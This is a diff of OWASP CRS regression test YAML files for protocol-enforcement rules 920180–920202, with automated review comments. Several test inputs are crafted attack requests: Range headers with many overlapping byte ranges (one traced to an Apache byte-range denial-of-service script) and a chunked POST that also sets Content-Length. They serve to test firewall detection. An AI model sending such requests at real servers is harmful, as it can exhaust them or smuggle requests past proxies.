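Review bot: The comments describing the three `encoded_request` payloads state `User-Agent: "OWASP CRS test agent"`, but the base64 decodes to `User-Agent: ModSecurity CRS 3 Tests` (the substring `VXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHM` appears in all three), so the comments no longer match what is sent. Every other test in this diff carries the new agent string in `headers:`; if any part of the test environment keys on that User-Agent, these three chunked requests are evaluated differently from the rest of the suite. Re-encode the raw requests with the new agent string (e.g. `printf 'POST / HTTP/1.1\r\nAccept: */*\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nUser-Agent: OWASP CRS test agent\r\n\r\n3\r\nHi \r\n3\r\nCRS\r\n0\r\n\r\n' | base64 -w0`) or, at minimum, correct the comments to the value actually encoded.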
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index 6af7fc1ac..0ed8225af 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml 
@@ -1,83 +1,81 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920180.yaml" - description: "Description" +rule_id: 920180 tests: - - test_title: 920180-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920180" - - test_title: 920180-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + autocomplete_headers: false + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920180] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "920180" - - test_title: 920180-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920180] + - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - - stage: 
- input: - stop_magic: true - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - output: - log_contains: id "920180" - - test_title: 920180-4 + - input: + autocomplete_headers: false + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + output: + log: + expect_ids: [920180] + - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/2.0 - output: - no_log_contains: id "920180" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/2.0 + output: + log: + no_expect_ids: [920180] 
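Review bot: Test 4 ("Ignore check of CT header if protocol is HTTP/2") does not set `autocomplete_headers: false`, yet the only difference between test 1 (expects 920180) and test 2 (does not) is that flag, which indicates the runner adds a Content-Length when it is on. If that holds for test 4 as well, its `no_expect_ids: [920180]` passes because the header is present, not because the HTTP/2 exemption works, so the version check is never exercised. Add `autocomplete_headers: false` to test 4's input, as tests 1 and 3 do, so the POST really lacks Content-Length. The desc also says "CT header" while the rule and the other descriptions concern Content-Length; `desc: Ignore missing Content-Length if protocol is HTTP/2` avoids confusion with Content-Type.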
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index 8dd729b78..189f62708 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,28 +1,26 @@ --- meta: author: "fgsch" - enabled: true - name: "920181.yaml" - description: "Description" +rule_id: 920181 tests: - - test_title: 920181-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - uri: "/anything" - headers: - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Length: 7 - Content-Type: "application/x-www-form-urlencoded" - Transfer-Encoding: "chunked" - User-Agent: "OWASP CRS test agent" - data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" - stop_magic: true - output: - # Apache unsets the Content-Length header if Transfer-Encoding is found! - status: [200] - no_log_contains: id "920181" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/anything" + headers: + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Length: 7 + Content-Type: "application/x-www-form-urlencoded" + Transfer-Encoding: "chunked" + User-Agent: "OWASP CRS test agent" + data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" + stop_magic: true + output: + # Apache unsets the Content-Length header if Transfer-Encoding is found! + status: 200 + log: + no_expect_ids: [920181] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 133323019..86df27281 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml 
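Review bot: The new side of 920181.yaml keeps `stop_magic: true`, while every other file in this migration replaces it with `autocomplete_headers: false`; if the new go-ftw release no longer recognizes `stop_magic`, the key is silently ignored and the runner may add or rewrite `Content-Length`, which for a request that deliberately carries both `Content-Length: 7` and `Transfer-Encoding: chunked` changes what is being tested. Change the line to `autocomplete_headers: false` for consistency with the rest of the suite. Quoting the value as `Content-Length: "7"` would also match the other files and keep it from being parsed as a YAML integer.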
@@ -1,61 +1,59 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920190.yaml" - description: "Description" +rule_id: 920190 tests: - - test_title: 920190-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "0-1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: HTTP/1.1 - output: - no_log_contains: id "920190" - - test_title: 920190-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "0-1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [920190] + - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - version: HTTP/1.1 - output: - log_contains: id "920190" - - test_title: 920190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + version: HTTP/1.1 + output: + log: + 
expect_ids: [920190] + - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920190\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Request-Range: bytes=64-0 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920190] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 07c81eacd..dc322f386 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml 
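Review bot: test_id 1 in 920190.yaml carries no `desc`, so nothing in the file states why `Range: "0-1"` (no `bytes=` unit prefix) is expected not to raise 920190, whereas tests 2 and 3 explain their intent; a line such as `desc: "Range value without a bytes= prefix, expected not to trigger"` would make the negative case reviewable without reading the rule. The same gap exists for tests 1–5 in 920200.yaml and tests 1–5 in 920210.yaml, where the `expect_ids`/`no_expect_ids` choice is the only documentation of what each input exercises (for 920200, test 3 is the only negative among the first five and nothing says it sits on the five-range boundary). The pre-existing `desc` strings also mix single and double quotes across these files; that is cosmetic, but cheap to unify while the schema is being rewritten.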
@@ -1,172 +1,170 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920200.yaml" - description: "Description" +rule_id: 920200 tests: - - test_title: 920200-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_title: 920200-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS 
test agent" - Host: "localhost" - Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920200\"" - - test_title: 920200-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 7 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 9 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 10 desc: This should PASS (PL2) stages: - - stage: - input: 
- dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 5d9e663d9..cdeed77c4 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml 
@@ -1,41 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920201.yaml" description: "Tests for 920201" +rule_id: 920201 tests: - - test_title: 920201-1 + - test_id: 1 desc: This should FAIL with rule 920201 (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" - - test_title: 920201-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + 
expect_ids: [920201] + - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920201] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index e5c9c3be3..8e6babaca 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml 
@@ -1,41 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920202.yaml" description: "Tests for 920202" +rule_id: 920202 tests: - - test_title: 920202-1 + - test_id: 1 desc: This should FAIL with rule 920202 (PL4) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" - - test_title: 920202-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920202] + - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920202] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index 4e7f952d6..69f531288 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml 
